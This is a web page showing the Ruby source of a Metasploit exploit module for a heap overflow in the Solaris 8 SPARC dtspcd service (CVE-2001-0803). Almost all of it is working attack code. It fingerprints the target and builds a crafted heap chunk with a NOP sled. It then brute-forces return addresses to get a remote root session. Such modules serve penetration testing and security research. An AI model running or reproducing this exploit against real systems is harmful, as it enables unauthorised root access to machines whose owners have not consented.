CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/solaris/dtspcd/heap_noir.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'Solaris dtspcd Heap Overflow',

14
      'Description'    => %q{

15
          This is a port of noir's dtspcd exploit. This module should

16
        work against any vulnerable version of Solaris 8 (sparc).

17
        The original exploit code was published in the book

18
        Shellcoder's Handbook.

19
      },

20
      'Author'         => [ 'noir <noir[at]uberhax0r.net>', 'hdm' ],

21
      'License'        => MSF_LICENSE,

22
      'References'     =>

23
        [

24
          [ 'CVE', '2001-0803'],

25
          [ 'OSVDB', '4503'],

26
          [ 'BID', '3517'],

27
          [ 'URL', 'http://www.cert.org/advisories/CA-2001-31.html'],

28
          [ 'URL', 'http://media.wiley.com/product_ancillary/83/07645446/DOWNLOAD/Source_Files.zip'],

29


30
        ],

31
      'Privileged'     => true,

32
      'Payload'        =>

33
        {

34
          'Space'    => 800,

35
          'BadChars' => "\x00\x0d",

36
          'PrependEncoder' => ("\xa4\x1c\x40\x11" * 3),

37
        },

38
      'Platform'       => 'solaris',

39
      'Arch'           => ARCH_SPARC,

40
      'Targets'        =>

41
        [

42
          ['Solaris 8',

43
            { 'Rets' =>

44
              [0xff3b0000, 0x2c000, 0x2f000, 0x400, [ 0x321b4, 0x361d8, 0x361e0, 0x381e8 ] ]

45
            }

46
          ],

47
        ],

48
      'DisclosureDate' => '2002-07-10',

49
      'DefaultTarget' => 0))

50


51
    register_options(

52
      [

53
        Opt::RPORT(6112)

54
      ])

55
  end

56


57


58
  def exploit

59
    return if not dtspcd_uname()

60


61
    target['Rets'][4].each do |tjmp|

62


63
      rbase = target['Rets'][1]

64


65
      while (rbase < target['Rets'][2]) do

66
        break if session_created?

67
        begin

68
          print_status(sprintf("Trying 0x%.8x 0x%.8x...", target['Rets'][0] + tjmp, rbase))

69
          attack(target['Rets'][0] + tjmp, rbase, payload.encoded)

70
          break if session_created?

71


72
          attack(target['Rets'][0] + tjmp, rbase + 4, payload.encoded)

73
          rbase += target['Rets'][3]

74
        rescue EOFError

75
        end

76
      end

77
    end

78


79
    handler

80
    disconnect

81
  end

82


83
  def check

84
    return Exploit::CheckCode::Detected if dtspcd_uname()

85
    return Exploit::CheckCode::Safe

86
  end

87


88
  def dtspcd_uname

89
    spc_connect()

90
    spc_write(spc_register('root', "\x00"), 4)

91
    host, os, ver, arch = spc_read().gsub("\x00", '').split(':')

92


93
    return false if not host

94


95
    print_status("Detected dtspcd running #{os} v#{ver} on #{arch} hardware")

96
    spc_write("", 2)

97
    return true

98
  end

99


100


101
  def chunk_create(retloc, retadd)

102
    "\x12\x12\x12\x12" +

103
    [retadd].pack('N')+

104
    "\x23\x23\x23\x23\xff\xff\xff\xff" +

105
    "\x34\x34\x34\x34\x45\x45\x45\x45" +

106
    "\x56\x56\x56\x56" +

107
    [retloc - 8].pack('N')

108
  end

109


110


111
  def attack(retloc, retadd, fcode)

112
    spc_connect()

113


114
    begin

115
      buf = ("\xa4\x1c\x40\x11\x20\xbf\xff\xff"  * ((4096 - 8 - fcode.length) / 8)) + fcode

116
      buf << "\x00\x00\x10\x3e\x00\x00\x00\x14"

117
      buf << "\x12\x12\x12\x12\xff\xff\xff\xff"

118
      buf << "\x00\x00\x0f\xf4"

119
      buf << chunk_create(retloc, retadd)

120
      buf << "X" * ((0x103e - 8) - buf.length)

121


122
      spc_write(spc_register("", buf), 4)

123


124
      handler

125


126
    rescue EOFError

127
    end

128
  end

129


130


131
  def spc_register(user='', buff='')

132
    "4 \x00#{user}\x00\x0010\x00#{buff}"

133
  end

134


135
  def spc_write(buff = '', cmd='')

136
    sock.put(sprintf("%08x%02x%04x%04x  %s", 2, cmd, buff.length, (@spc_seq += 1), buff))

137
  end

138


139
  def spc_read

140
    # Bytes: 0-9 = channel, 9-10 = cmd, 10-13 = mbl, 14-17 = seq

141
    head = sock.get_once(20)

142
    sock.get_once( head[10, 13].hex ) || ''

143
  end

144


145
  def spc_connect

146
    disconnect

147
    connect

148
    @spc_seq = 0

149
  end

150
end

151


152